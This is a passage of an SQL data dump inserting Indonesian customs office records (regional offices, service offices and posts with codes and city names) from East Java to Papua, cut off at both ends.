kantor VALUES ('070700', 'KANTOR PELAYANAN BLITAR', 'BLITAR'); INSERT INTO kantor VALUES ('070800', 'KANTOR PELAYANAN KEDIRI', 'KEDIRI'); INSERT INTO kantor VALUES ('070831', 'POS NGANJUK', 'NGANJUK'); INSERT INTO kantor VALUES ('070833', 'POS KERTOSONO', 'KERTOSONO'); INSERT INTO kantor VALUES ('070834', 'POS CUKIR', ''); INSERT INTO kantor VALUES ('070835', 'POS JOMBANG', 'JOMBANG'); INSERT INTO kantor VALUES ('070900', 'KANTOR PELAYANAN TULUNGAGUNG', 'TULUNGAGUNG'); INSERT INTO kantor VALUES ('070932', 'POS POPOH', ''); INSERT INTO kantor VALUES ('071000', 'KANTOR PELAYANAN MADIUN', 'MADIUN'); INSERT INTO kantor VALUES ('071031', 'POS MAGETAN', 'MAGETAN'); INSERT INTO kantor VALUES ('071032', 'POS NGAWI', 'NGAWI'); INSERT INTO kantor VALUES ('071033', 'POS PONOROGO', 'PONOROGO'); INSERT INTO kantor VALUES ('071034', 'POS CARUBAN', 'CARUBAN'); INSERT INTO kantor VALUES ('071035', 'POS PACITAN', 'PACITAN'); INSERT INTO kantor VALUES ('071100', 'KANTOR PELAYANAN PANARUKAN', 'PANARUKAN'); INSERT INTO kantor VALUES ('071112', 'KANTOR BANTU TANJUNG WANGI', ''); INSERT INTO kantor VALUES ('071132', 'POS JEMBER', 'JEMBER'); INSERT INTO kantor VALUES ('071134', 'POS SITUBONDO', 'SITUBONDO'); INSERT INTO kantor VALUES ('071135', 'POS BESUKI', ''); INSERT INTO kantor VALUES ('071136', 'POS KALBUT', ''); INSERT INTO kantor VALUES ('071137', 'POS JANGKAR', ''); INSERT INTO kantor VALUES ('071138', 'POS BONDOWOSO', ''); INSERT INTO kantor VALUES ('071139', 'POS PUGER', ''); INSERT INTO kantor VALUES ('071140', 'POS PANARUKAN', ''); INSERT INTO kantor VALUES ('071141', 'POS RAMBI PUJI', ''); INSERT INTO kantor VALUES ('071142', 'POS BANYUWANGI', ''); INSERT INTO kantor VALUES ('071143', 'POS TANJUNG WANGI', ''); INSERT INTO kantor VALUES ('071144', 'POS MUNCAR', ''); INSERT INTO kantor VALUES ('071145', 'POS GRAJAGAN', ''); INSERT INTO kantor VALUES ('071146', 'POS KETAPANG', ''); INSERT INTO kantor VALUES ('071200', 'KANTOR PELAYANAN PROBOLINGGO', 'PROBOLINGGO'); INSERT INTO kantor VALUES ('071232', 'POS PEJARAKAN', ''); INSERT INTO kantor VALUES ('071235', 'POS LUMAJANG', ''); INSERT INTO kantor VALUES ('071236', 'POS PAITON', ''); INSERT INTO kantor VALUES ('071237', 'POS PROBOLINGGO', ''); INSERT INTO kantor VALUES ('071300', 'KANTOR PELAYANAN PASURUAN', 'PASURUAN'); INSERT INTO kantor VALUES ('071333', 'POS PASURUAN', ''); INSERT INTO kantor VALUES ('071334', 'POS LEKOK', ''); INSERT INTO kantor VALUES ('080000', 'KANTOR WILAYAH VIII DENPASAR', 'DENPASAR'); INSERT INTO kantor VALUES ('080100', 'KANTOR PELAYANAN NGURAH RAI', 'DENPASAR'); INSERT INTO kantor VALUES ('080131', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('080132', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('080133', 'POS BANDARA III', ''); INSERT INTO kantor VALUES ('080134', 'POS KARANGASEM', ''); INSERT INTO kantor VALUES ('080135', 'POS BANGLI', ''); INSERT INTO kantor VALUES ('080136', 'POS KLUNGKUNG', ''); INSERT INTO kantor VALUES ('080137', 'POS GIANYAR', ''); INSERT INTO kantor VALUES ('080138', 'POS TABANAN', ''); INSERT INTO kantor VALUES ('080139', 'POS PINTU UTAMA PADANG BAI', ''); INSERT INTO kantor VALUES ('080140', 'POS DARMAGA PADANG BAI', ''); INSERT INTO kantor VALUES ('080141', 'POS PERTAMINA AMUK', ''); INSERT INTO kantor VALUES ('080300', 'KANTOR PELAYANAN MATARAM', 'LEMBAR'); INSERT INTO kantor VALUES ('080331', 'POS LABUHAN HAJI', ''); INSERT INTO kantor VALUES ('080332', 'POS LABUHAN LOMBOK', ''); INSERT INTO kantor VALUES ('080333', 'POS BANDARA SELAPARANG', ''); INSERT INTO kantor VALUES ('080334', 'POS LEMBAR', ''); INSERT INTO kantor VALUES ('080335', 'POS PEMENANG', ''); INSERT INTO kantor VALUES ('080400', 'KANTOR PELAYANAN BIMA', 'BIMA'); INSERT INTO kantor VALUES ('080411', 'KANTOR BANTU BADAS SUMBAWA', ''); INSERT INTO kantor VALUES ('080412', 'KANTOR BANTU BENETE', ''); INSERT INTO kantor VALUES ('080431', 'POS SAPE', ''); INSERT INTO kantor VALUES ('080432', 'POS LABUHAN ALAS', ''); INSERT INTO kantor VALUES ('080433', 'POS BANDARA BRANG BIJI', ''); INSERT INTO kantor VALUES ('080434', 'POS BANDARA PALIBELO', ''); INSERT INTO kantor VALUES ('080435', 'POS BIMA', ''); INSERT INTO kantor VALUES ('080437', 'POS PEL. FERRY POTOTANO', ''); INSERT INTO kantor VALUES ('080439', 'POS KEMPU', ''); INSERT INTO kantor VALUES ('080500', 'KANTOR PELAYANAN KUPANG', 'TENAU KUPANG'); INSERT INTO kantor VALUES ('080513', 'KANTOR BANTU WAINGAPU', ''); INSERT INTO kantor VALUES ('080536', 'POS BAA/P. ROTE', ''); INSERT INTO kantor VALUES ('080537', 'POS BANDARA MAUHAI', ''); INSERT INTO kantor VALUES ('080538', 'POS BANDARA TAMBOLAKA', ''); INSERT INTO kantor VALUES ('080539', 'POS RUA', ''); INSERT INTO kantor VALUES ('080540', 'POS TENAU', ''); INSERT INTO kantor VALUES ('080700', 'KANTOR PELAYANAN MAUMERE', 'MAUMERE'); INSERT INTO kantor VALUES ('080711', 'KANTOR BANTU LARANTUKA', ''); INSERT INTO kantor VALUES ('080712', 'KANTOR BANTU KEDINDI REO', ''); INSERT INTO kantor VALUES ('080713', 'KANTOR BANTU ENDE (PL dan POS LALU BEA)', ''); INSERT INTO kantor VALUES ('080731', 'POS LABUHAN BAJO (PU)', ''); INSERT INTO kantor VALUES ('080733', 'POS BANDARA SATARTACIK', ''); INSERT INTO kantor VALUES ('080734', 'POS BANDARA GEWAYANGTANA', ''); INSERT INTO kantor VALUES ('080735', 'POS BANDARA WAJOTI', ''); INSERT INTO kantor VALUES ('080737', 'POS BANDARA PADHA MALEDA', ''); INSERT INTO kantor VALUES ('080738', 'POS MAUMERE', ''); INSERT INTO kantor VALUES ('080739', 'POS ENDE IPI', ''); INSERT INTO kantor VALUES ('080740', 'POS BANDARA H. AROEBOESMAN', ''); INSERT INTO kantor VALUES ('080741', 'POS LABUHAN BAJO dan KOMODO (PL)', ''); INSERT INTO kantor VALUES ('081200', 'KANTOR PELAYANAN BENOA', ''); INSERT INTO kantor VALUES ('081211', 'KANTOR BANTU CELUKAN BAWANG', ''); INSERT INTO kantor VALUES ('081231', 'POS NUSA PANIDA', ''); INSERT INTO kantor VALUES ('081232', 'POS DARMAGA CARGO I', ''); INSERT INTO kantor VALUES ('081233', 'POS DARMAGA CARGO II', ''); INSERT INTO kantor VALUES ('081234', 'POS DARMAGA KAPAL IKAN', ''); INSERT INTO kantor VALUES ('081235', 'POS DARMAGA KAPAL TURIS', ''); INSERT INTO kantor VALUES ('081237', 'POS BULELENG', ''); INSERT INTO kantor VALUES ('081238', 'POS NEGARA', ''); INSERT INTO kantor VALUES ('081239', 'POS GILIMANUK', ''); INSERT INTO kantor VALUES ('081300', 'KANTOR PELAYANAN ATAPUPU', ''); INSERT INTO kantor VALUES ('081311', 'KANTOR BANTU MOTA AIN (LBD)', ''); INSERT INTO kantor VALUES ('081312', 'KANTOR BANTU MOTA MAUK (LBD)', ''); INSERT INTO kantor VALUES ('081313', 'KANTOR BANTU NAPAN (LBD)', ''); INSERT INTO kantor VALUES ('081314', 'KANTOR BANTU KALABAHI (LBD)', ''); INSERT INTO kantor VALUES ('081331', 'POS BANDARA HALIWEN', ''); INSERT INTO kantor VALUES ('081332', 'POS LINTAS BATAS DAERAH WINI', ''); INSERT INTO kantor VALUES ('081333', 'POS BANDARA MALI', ''); INSERT INTO kantor VALUES ('090000', 'KANTOR WILAYAH IX PONTIANAK', 'PONTIANAK'); INSERT INTO kantor VALUES ('090100', 'KANTOR PELAYANAN PONTIANAK', 'PONTIANAK'); INSERT INTO kantor VALUES ('090111', 'KANTOR BANTU BANDARA SUPADIO', ''); INSERT INTO kantor VALUES ('090131', 'POS JUNGKAT', ''); INSERT INTO kantor VALUES ('090137', 'POS PONTIANAK', ''); INSERT INTO kantor VALUES ('090138', 'POS SUNGAI KAKAP', ''); INSERT INTO kantor VALUES ('090200', 'KANTOR PELAYANAN ENTIKONG', 'ENTIKONG'); INSERT INTO kantor VALUES ('090211', 'KANTOR BANTU NANGAU BADAU', ''); INSERT INTO kantor VALUES ('090231', 'POS MARAKAI PANJANG', ''); INSERT INTO kantor VALUES ('090234', 'POS SIMPANG TIGA LUBUK SABUK', ''); INSERT INTO kantor VALUES ('090235', 'POS SEGUMON', ''); INSERT INTO kantor VALUES ('090236', 'POS BANTAN', ''); INSERT INTO kantor VALUES ('090238', 'POS NANGA BAYAN', ''); INSERT INTO kantor VALUES ('090300', 'KANTOR PELAYANAN TELUK AIR', 'TELUK AIR'); INSERT INTO kantor VALUES ('090331', 'POS KUBU', ''); INSERT INTO kantor VALUES ('090332', 'POS TELUK AIR', ''); INSERT INTO kantor VALUES ('090333', 'POS PADANG TIKAR', ''); INSERT INTO kantor VALUES ('090400', 'KANTOR PELAYANAN KETAPANG', 'KETAPANG'); INSERT INTO kantor VALUES ('090411', 'KANTOR BANTU KENDAWANGAN', ''); INSERT INTO kantor VALUES ('090431', 'POS TELUK BATANG', ''); INSERT INTO kantor VALUES ('090433', 'POS TELUK MELANO', ''); INSERT INTO kantor VALUES ('090434', 'POS KETAPANG', ''); INSERT INTO kantor VALUES ('090435', 'POS BANDARA RAHADI USMAN', ''); INSERT INTO kantor VALUES ('090500', 'KANTOR PELAYANAN SINTETE', 'SINTETE'); INSERT INTO kantor VALUES ('090511', 'KANTOR BANTU JAGOI BABANG', ''); INSERT INTO kantor VALUES ('090512', 'KANTOR BANTU SAMBAS', ''); INSERT INTO kantor VALUES ('090531', 'POS SINGKAWANG', 'SINGKAWANG'); INSERT INTO kantor VALUES ('090532', 'POS TELUK SUAK', ''); INSERT INTO kantor VALUES ('090534', 'POS SIDDING', ''); INSERT INTO kantor VALUES ('090537', 'POS PEMANGKAT', ''); INSERT INTO kantor VALUES ('090538', 'POS PENJAJAB', ''); INSERT INTO kantor VALUES ('090539', 'POS ARUK', ''); INSERT INTO kantor VALUES ('090540', 'POS SAJINGAN', ''); INSERT INTO kantor VALUES ('090541', 'POS SAPARAN', ''); INSERT INTO kantor VALUES ('090542', 'POS TEMAJUK', ''); INSERT INTO kantor VALUES ('090543', 'POS TEBAS', ''); INSERT INTO kantor VALUES ('090700', 'KANTOR PELAYANAN SAMPIT', 'SAMPIT'); INSERT INTO kantor VALUES ('090731', 'POS SAMUDA', ''); INSERT INTO kantor VALUES ('090732', 'POS KUALA PEMBUANG', ''); INSERT INTO kantor VALUES ('090733', 'POS PEGATAN MENDAWAI', ''); INSERT INTO kantor VALUES ('090734', 'POS BANDARA H.ASAN', ''); INSERT INTO kantor VALUES ('090735', 'POS SAMPIT', ''); INSERT INTO kantor VALUES ('090800', 'KANTOR PELAYANAN PANGKALAN BUN', 'PANGKALAN BUN'); INSERT INTO kantor VALUES ('090811', 'KANTOR BANTU KUMAI', ''); INSERT INTO kantor VALUES ('090831', 'POS MUARA S. ARUT', ''); INSERT INTO kantor VALUES ('090833', 'POS KUALA JELAI', ''); INSERT INTO kantor VALUES ('090834', 'POS BANDARA ISKANDAR', ''); INSERT INTO kantor VALUES ('090835', 'POS PANGKALAN BUN', ''); INSERT INTO kantor VALUES ('090900', 'KANTOR PELAYANAN PULANG PISAU', 'PULANG PISAU'); INSERT INTO kantor VALUES ('090911', 'KANTOR BANTU KUALA KAPUAS', ''); INSERT INTO kantor VALUES ('090931', 'POS BAHAUR', ''); INSERT INTO kantor VALUES ('090932', 'POS BANDARA CILIKRIWUT', ''); INSERT INTO kantor VALUES ('090933', 'POS BANDARA BERINGIN', ''); INSERT INTO kantor VALUES ('090934', 'POS PULANG PISAU', ''); INSERT INTO kantor VALUES ('090935', 'POS MANGKAHOI', ''); INSERT INTO kantor VALUES ('100000', 'KANTOR WILAYAH X BALIKPAPAN', 'BALIKPAPAN'); INSERT INTO kantor VALUES ('100100', 'KANTOR PELAYANAN BANJARMASIN', 'BANJARMASIN'); INSERT INTO kantor VALUES ('100131', 'POS BANDARA SAMSUDIN NOOR', 'BANJARMASIN'); INSERT INTO kantor VALUES ('100134', 'POS BANDARA WARUKIN', ''); INSERT INTO kantor VALUES ('100135', 'POS ASAM-ASAM / KINTAP', ''); INSERT INTO kantor VALUES ('100136', 'POS BANJARMASIN', ''); INSERT INTO kantor VALUES ('100137', 'POS JORONG', ''); INSERT INTO kantor VALUES ('100200', 'KANTOR PELAYANAN KOTABARU', 'KOTABARU'); INSERT INTO kantor VALUES ('100211', 'KANTOR BANTU BATU LICIN', ''); INSERT INTO kantor VALUES ('100231', 'POS PEGATAN', ''); INSERT INTO kantor VALUES ('100233', 'POS TG.PEMANCINGAN', ''); INSERT INTO kantor VALUES ('100234', 'POS MEKAR PUTIH', ''); INSERT INTO kantor VALUES ('100235', 'POS BANDARA STAGEN', ''); INSERT INTO kantor VALUES ('100236', 'POS KOTA BARU', ''); INSERT INTO kantor VALUES ('100237', 'POS TARJUN', ''); INSERT INTO kantor VALUES ('100239', 'POS PELABUHAN STAGEN', ''); INSERT INTO kantor VALUES ('100240', 'POS SATUI', ''); INSERT INTO kantor VALUES ('100300', 'KANTOR PELAYANAN BALIKPAPAN', 'BALIKPAPAN'); INSERT INTO kantor VALUES ('100312', 'KANTOR BANTU TANAH GROGOT', ''); INSERT INTO kantor VALUES ('100313', 'KANTOR BANTU TANJUNG SANTAN', ''); INSERT INTO kantor VALUES ('100331', 'POS KAMPUNG BARU', ''); INSERT INTO kantor VALUES ('100332', 'POS PENAJAM', ''); INSERT INTO kantor VALUES ('100335', 'POS BALIKPAPAN', ''); INSERT INTO kantor VALUES ('100336', 'POS TANJUNG BATU', ''); INSERT INTO kantor VALUES ('100337', 'POS KARIANGGAU', ''); INSERT INTO kantor VALUES ('100500', 'KANTOR PELAYANAN SAMARINDA', 'SAMARINDA'); INSERT INTO kantor VALUES ('100512', 'KANTOR BANTU SENIPAH', ''); INSERT INTO kantor VALUES ('100531', 'POS HANDIL DUA', ''); INSERT INTO kantor VALUES ('100532', 'POS MUARA SANGA-SANGA', ''); INSERT INTO kantor VALUES ('100534', 'POS MUARA BADAK', ''); INSERT INTO kantor VALUES ('100535', 'POS TENGGARONG', ''); INSERT INTO kantor VALUES ('100536', 'POS BANDARA TEMINDUNG', ''); INSERT INTO kantor VALUES ('100538', 'POS SAMARINDA', ''); INSERT INTO kantor VALUES ('100600', 'KANTOR PELAYANAN BONTANG', 'BONTANG'); INSERT INTO kantor VALUES ('100631', 'POS LHOK TUAN', ''); INSERT INTO kantor VALUES ('100632', 'POS BONTANG', ''); INSERT INTO kantor VALUES ('100633', 'POS NYERANGAT SEKAMBING', ''); INSERT INTO kantor VALUES ('100800', 'KANTOR PELAYANAN TARAKAN', 'TARAKAN'); INSERT INTO kantor VALUES ('100811', 'KANTOR BANTU BUNYU', ''); INSERT INTO kantor VALUES ('100812', 'KANTOR BANTU REDEP', ''); INSERT INTO kantor VALUES ('100832', 'POS TANJUNG SELOR', ''); INSERT INTO kantor VALUES ('100833', 'POS BANDARA TARAKAN', ''); INSERT INTO kantor VALUES ('100834', 'POS BANDARA TANJUNG REDEP', ''); INSERT INTO kantor VALUES ('100835', 'POS TARAKAN', ''); INSERT INTO kantor VALUES ('100836', 'POS BUNYU', ''); INSERT INTO kantor VALUES ('100837', 'POS LONG NAWANG', ''); INSERT INTO kantor VALUES ('100838', 'POS LONG BAWAN', ''); INSERT INTO kantor VALUES ('100839', 'POS MALINO', ''); INSERT INTO kantor VALUES ('100900', 'KANTOR PELAYANAN NUNUKAN', 'NUNUKAN'); INSERT INTO kantor VALUES ('100912', 'KANTOR BANTU SUNGAI NYAMUK', ''); INSERT INTO kantor VALUES ('100932', 'POS LEMIJUNG', ''); INSERT INTO kantor VALUES ('100933', 'POS NUNUKAN', ''); INSERT INTO kantor VALUES ('100934', 'POS SUNGAI PANCANG', ''); INSERT INTO kantor VALUES ('100935', 'POS AJI KUNING', ''); INSERT INTO kantor VALUES ('101000', 'KANTOR PELAYANAN TANJUNG BARA /SANGATA', ''); INSERT INTO kantor VALUES ('101031', 'POS SANGKURILANG', ''); INSERT INTO kantor VALUES ('101032', 'POS TANJUNG BARA SANGATA', ''); INSERT INTO kantor VALUES ('110000', 'KANTOR WILAYAH XI MAKASAR', 'MAKASSAR'); INSERT INTO kantor VALUES ('110100', 'KANTOR PELAYANAN MAKASAR', 'MAKASSAR'); INSERT INTO kantor VALUES ('110101', 'PANGKALAN SARANA OPERASI PANTOLOAN', ''); INSERT INTO kantor VALUES ('110111', 'KANTOR BANTU BENTENG/P.SELAYAR', ''); INSERT INTO kantor VALUES ('110113', 'KANTOR BANTU BIRINGKASI', ''); INSERT INTO kantor VALUES ('110131', 'POS BANTAENG', ''); INSERT INTO kantor VALUES ('110132', 'POS BULU KUMBA', ''); INSERT INTO kantor VALUES ('110138', 'POS PAOTERE', ''); INSERT INTO kantor VALUES ('110139', 'POS SUKARNO I', ''); INSERT INTO kantor VALUES ('110140', 'POS SUKARNO II', ''); INSERT INTO kantor VALUES ('110141', 'POS HATTA I', ''); INSERT INTO kantor VALUES ('110142', 'POS HATTAII', ''); INSERT INTO kantor VALUES ('110300', 'KANTOR PELAYANAN PARE-PARE', 'PARE-PARE'); INSERT INTO kantor VALUES ('110332', 'POS BARRU', ''); INSERT INTO kantor VALUES ('110339', 'POS PARE-PARE', ''); INSERT INTO kantor VALUES ('110340', 'POS WATANSOPPENG', ''); INSERT INTO kantor VALUES ('110342', 'POS MAMUJU', ''); INSERT INTO kantor VALUES ('110400', 'KANTOR PELAYANAN MALILI', 'BALANTANG'); INSERT INTO kantor VALUES ('110411', 'KANTOR BANTU PALOPO', 'PALOPO'); INSERT INTO kantor VALUES ('110433', 'POS SIWA', ''); INSERT INTO kantor VALUES ('110436', 'POS BALANTANG', ''); INSERT INTO kantor VALUES ('110437', 'POS BANDARA SOROAKO', ''); INSERT INTO kantor VALUES ('110500', 'KANTOR PELAYANAN BAJO\'E', 'BAJO\'E'); INSERT INTO kantor VALUES ('110533', 'POS SINJAI', ''); INSERT INTO kantor VALUES ('110535', 'POS ULOE', ''); INSERT INTO kantor VALUES ('110537', 'POS BAJO\'E', ''); INSERT INTO kantor VALUES ('110539', 'POS ARESO\'E', ''); INSERT INTO kantor VALUES ('110540', 'POS PATTIRO', ''); INSERT INTO kantor VALUES ('110600', 'KANTOR PELAYANAN KENDARI', 'KENDARI'); INSERT INTO kantor VALUES ('110611', 'KANTOR BANTU BAU-BAU', ''); INSERT INTO kantor VALUES ('110631', 'POS WAWONI', ''); INSERT INTO kantor VALUES ('110632', 'POS LASOLO', ''); INSERT INTO kantor VALUES ('110634', 'POS WANCI', ''); INSERT INTO kantor VALUES ('110635', 'POS RAHA', ''); INSERT INTO kantor VALUES ('110636', 'POS SIKELI', ''); INSERT INTO kantor VALUES ('110637', 'POS BANABUNI', ''); INSERT INTO kantor VALUES ('110638', 'POS BANDARA WOLTER MONGINSIDI', ''); INSERT INTO kantor VALUES ('110639', 'POS KENDARI', ''); INSERT INTO kantor VALUES ('110640', 'POS EREKE', ''); INSERT INTO kantor VALUES ('110700', 'KANTOR PELAYANAN POMALAA', 'POMALAA'); INSERT INTO kantor VALUES ('110731', 'POS KOLAKA', ''); INSERT INTO kantor VALUES ('110734', 'POS POMALAA', ''); INSERT INTO kantor VALUES ('110735', 'POS BOEPINANG', ''); INSERT INTO kantor VALUES ('110800', 'KANTOR PELAYANAN PANTOLOAN', 'PANTOLOAN'); INSERT INTO kantor VALUES ('110811', 'KANTOR BANTU TOLI-TOLI', 'TOLI-TOLI'); INSERT INTO kantor VALUES ('110832', 'POS WANI', ''); INSERT INTO kantor VALUES ('110833', 'POS SABANG', ''); INSERT INTO kantor VALUES ('110834', 'POS PARIGI', ''); INSERT INTO kantor VALUES ('110835', 'POS BANDARA MUTIARA', ''); INSERT INTO kantor VALUES ('110836', 'POS LOLI', ''); INSERT INTO kantor VALUES ('110837', 'POS OGOTUA', ''); INSERT INTO kantor VALUES ('110838', 'POS LEOK', ''); INSERT INTO kantor VALUES ('110839', 'POS PALELEH', ''); INSERT INTO kantor VALUES ('110840', 'POS PANTOLOAN', ''); INSERT INTO kantor VALUES ('110841', 'POS PASANG KAYU', ''); INSERT INTO kantor VALUES ('110842', 'POS MOUTONG', ''); INSERT INTO kantor VALUES ('110843', 'POS DONGGALA', ''); INSERT INTO kantor VALUES ('110900', 'KANTOR PELAYANAN POSO', 'POSO'); INSERT INTO kantor VALUES ('110931', 'POS AMPANA', ''); INSERT INTO kantor VALUES ('110932', 'POS KOLONEDALE', ''); INSERT INTO kantor VALUES ('110933', 'POS BANDARA KASIGUNCU', ''); INSERT INTO kantor VALUES ('110934', 'POS MOAHINO/BOHUMBELU', ''); INSERT INTO kantor VALUES ('110935', 'POS POSO', ''); INSERT INTO kantor VALUES ('110936', 'POS WAKAI', ''); INSERT INTO kantor VALUES ('111000', 'KANTOR PELAYANAN LUWUK', 'LUWUK'); INSERT INTO kantor VALUES ('111031', 'POS PAGIMANA', ''); INSERT INTO kantor VALUES ('111032', 'POS BANGGAI', ''); INSERT INTO kantor VALUES ('111033', 'POS TOILI', ''); INSERT INTO kantor VALUES ('111034', 'POS BUNTA', ''); INSERT INTO kantor VALUES ('111035', 'POS BANDARA BUBUNG', ''); INSERT INTO kantor VALUES ('111036', 'POS LUWUK', ''); INSERT INTO kantor VALUES ('111100', 'KANTOR PELAYANAN BITUNG', 'BITUNG'); INSERT INTO kantor VALUES ('111131', 'POS KEMA', ''); INSERT INTO kantor VALUES ('111132', 'POS BELANG', ''); INSERT INTO kantor VALUES ('111133', 'POS KOTABUNAN', ''); INSERT INTO kantor VALUES ('111134', 'POS LIKUPANG', ''); INSERT INTO kantor VALUES ('111137', 'POS BITUNG', ''); INSERT INTO kantor VALUES ('111139', 'POS RATATOTOK', ''); INSERT INTO kantor VALUES ('111200', 'KANTOR PELAYANAN MANADO', 'MANADO'); INSERT INTO kantor VALUES ('111211', 'KANTOR BANTU LABUHAN UKI', ''); INSERT INTO kantor VALUES ('111212', 'KANTOR BANTU TAHUNA', ''); INSERT INTO kantor VALUES ('111213', 'KANTOR BANTU HULU SIAU', ''); INSERT INTO kantor VALUES ('111214', 'KANTOR BANTU MARORE', ''); INSERT INTO kantor VALUES ('111215', 'KANTOR BANTU MIANGAS', ''); INSERT INTO kantor VALUES ('111216', 'KANTOR BANTU AMURANG', ''); INSERT INTO kantor VALUES ('111217', 'KANTOR BANTU LIRUNG', ''); INSERT INTO kantor VALUES ('111233', 'POS INOBONTO', ''); INSERT INTO kantor VALUES ('111239', 'POS TAGULANDANG', ''); INSERT INTO kantor VALUES ('111240', 'POS MANADO', ''); INSERT INTO kantor VALUES ('111241', 'POS BANDARA SAM RATULANGI', ''); INSERT INTO kantor VALUES ('111242', 'POS MALIBAGU', ''); INSERT INTO kantor VALUES ('111300', 'KANTOR PELAYANAN GORONTALO', 'GORONTALO'); INSERT INTO kantor VALUES ('111331', 'POS KUANDANG', ''); INSERT INTO kantor VALUES ('111333', 'POS PAGUAT', ''); INSERT INTO kantor VALUES ('111334', 'POS PAPAYATO', ''); INSERT INTO kantor VALUES ('111335', 'POS BANDARA JALALUDIN', ''); INSERT INTO kantor VALUES ('111336', 'POS GORONTALO', ''); INSERT INTO kantor VALUES ('120000', 'KANTOR WILAYAH XII AMBON', 'AMBON'); INSERT INTO kantor VALUES ('120100', 'KANTOR PELAYANAN AMBON', 'AMBON'); INSERT INTO kantor VALUES ('120111', 'KANTOR BANTU WAISARISA', ''); INSERT INTO kantor VALUES ('120114', 'KANTOR BANTU BANDARA PATTIMURA', ''); INSERT INTO kantor VALUES ('120131', 'POS BANDA', ''); INSERT INTO kantor VALUES ('120132', 'POS NAMLEA', ''); INSERT INTO kantor VALUES ('120135', 'POS GESER', ''); INSERT INTO kantor VALUES ('120137', 'POS WAINIBE / P.BURU', ''); INSERT INTO kantor VALUES ('120138', 'POS MASOHI', ''); INSERT INTO kantor VALUES ('120139', 'POS AMBON', ''); INSERT INTO kantor VALUES ('120140', 'POS GALALA', ''); INSERT INTO kantor VALUES ('120141', 'POS TULEHU', ''); INSERT INTO kantor VALUES ('120143', 'POS HITU', ''); INSERT INTO kantor VALUES ('120144', 'POS OPIN/PASAHARI', ''); INSERT INTO kantor VALUES ('120200', 'KANTOR PELAYANAN TERNATE', 'TERNATE'); INSERT INTO kantor VALUES ('120211', 'KANTOR BANTU P. GEBE', ''); INSERT INTO kantor VALUES ('120212', 'KANTOR BANTU GALELA/TOBELO', ''); INSERT INTO kantor VALUES ('120213', 'KANTOR BANTU P. MANOLE', ''); INSERT INTO kantor VALUES ('120232', 'POS LABUHA', ''); INSERT INTO kantor VALUES ('120234', 'POS BANDARA BABULLAH', ''); INSERT INTO kantor VALUES ('120236', 'POS TERNATE', ''); INSERT INTO kantor VALUES ('120237', 'POS BASTIONG', ''); INSERT INTO kantor VALUES ('120238', 'POS SANANA', ''); INSERT INTO kantor VALUES ('120239', 'POS TANJUNG BARNABAS', ''); INSERT INTO kantor VALUES ('120300', 'KANTOR PELAYANAN SORONG', 'SORONG'); INSERT INTO kantor VALUES ('120311', 'KANTOR BANTU TELUK KASIM', ''); INSERT INTO kantor VALUES ('120331', 'POS BANDARA JEFMAN', ''); INSERT INTO kantor VALUES ('120332', 'POS PULAU GAK', ''); INSERT INTO kantor VALUES ('120335', 'POS DARMAGA KHUSUS USAHA MINA', 'MINA'); INSERT INTO kantor VALUES ('120337', 'POS ARAR', ''); INSERT INTO kantor VALUES ('120338', 'POS SORONG', ''); INSERT INTO kantor VALUES ('120400', 'KANTOR PELAYANAN MANOKWARI', 'MANOKWARI'); INSERT INTO kantor VALUES ('120412', 'KANTOR BANTU BABO', ''); INSERT INTO kantor VALUES ('120431', 'POS BINTUNI', ''); INSERT INTO kantor VALUES ('120432', 'POS BANDARA RENDANI', ''); INSERT INTO kantor VALUES ('120433', 'POS MANOKWARI', ''); INSERT INTO kantor VALUES ('120435', 'POS WIMRO', ''); INSERT INTO kantor VALUES ('120500', 'KANTOR PELAYANAN FAK-FAK', 'FAK-FAK'); INSERT INTO kantor VALUES ('120531', 'POS KAIMANA', ''); INSERT INTO kantor VALUES ('120532', 'POS KOKAS', ''); INSERT INTO kantor VALUES ('120533', 'POS PULAU ADI', ''); INSERT INTO kantor VALUES ('120534', 'POS BANDARA FAK-FAK', ''); INSERT INTO kantor VALUES ('120535', 'POS FAK-FAK', ''); INSERT INTO kantor VALUES ('120600', 'KANTOR PELAYANAN JAYAPURA', 'JAYAPURA'); INSERT INTO kantor VALUES ('120611', 'KANTOR BANTU BANDARA SENTANI', ''); INSERT INTO kantor VALUES ('120612', 'KANTOR BANTU SKOU', ''); INSERT INTO kantor VALUES ('120631', 'POS SARMI', ''); INSERT INTO kantor VALUES ('120633', 'POS KIWIROK', ''); INSERT INTO kantor VALUES ('120634', 'POS SENGAI', ''); INSERT INTO kantor VALUES ('120635', 'POS WARIS', ''); INSERT INTO kantor VALUES ('120636', 'POS WEMBI', ''); INSERT INTO kantor VALUES ('120637', 'POS DEMTA', ''); INSERT INTO kantor VALUES ('120638', 'POS WAMENA', ''); INSERT INTO kantor VALUES ('120639', 'POS JAYAPURA', ''); INSERT INTO kantor VALUES ('120700', 'KANTOR PELAYANAN MERAUKE', 'MERAUKE'); INSERT INTO kantor VALUES ('120731', 'POS SORTA', ''); INSERT INTO kantor VALUES ('120732', 'POS BUPUL', ''); INSERT INTO kantor VALUES ('120734', 'POS MINDIPTANAA', ''); INSERT INTO kantor VALUES ('120736', 'POS AGATS', ''); INSERT INTO kantor VALUES ('120737', 'POS BADE', ''); INSERT INTO kantor VALUES ('120738', 'POS BANDARA MOPAH', ''); INSERT INTO kantor VALUES ('120739', 'POS MERAUKE', ''); INSERT INTO kantor VALUES ('120740', 'POS WANAM', ''); INSERT INTO kantor VALUES ('120800', 'KANTOR PELAYANAN AMAMAPARE', 'AMAMAPARE'); INSERT INTO kantor VALUES ('120812', 'KANTOR BANTU KULALA KENCANA/KOTA BARU', ''); INSERT INTO kantor VALUES ('120813', 'KANTOR BANTU BANDARA TIMIKA', ''); INSERT INTO kantor VALUES ('120831', 'POS AMAMAPARE', ''); INSERT INTO kantor VALUES ('120832', 'POS CARGO DOCK', ''); INSERT INTO kantor VALUES ('120833', 'POS PAD XI', ''); INSERT INTO kantor VALUES ('120834', 'POS ETNA', ''); INSERT INTO kantor VALUES ('120835', 'POS TEMBAGAPURA', ''); INSERT INTO kantor VALUES ('120836', 'POS POMAKO I', ''); INSERT INTO kantor VALUES ('120900', 'KANTOR PELAYANAN BIAK', 'BIAK'); INSERT INTO kantor VALUES ('120911', 'KANTOR BANTU NABIRE/TELUK KIMI', ''); INSERT INTO kantor VALUES ('120931', 'POS SERUI', ''); INSERT INTO kantor VALUES ('120933', 'POS BIAK', ''); INSERT INTO kantor VALUES ('120934', 'POS DAWAI', ''); INSERT INTO kantor VALUES ('121000', 'KANTOR PELAYANAN TUAL', ''); INSERT INTO kantor VALUES ('121031', 'POS 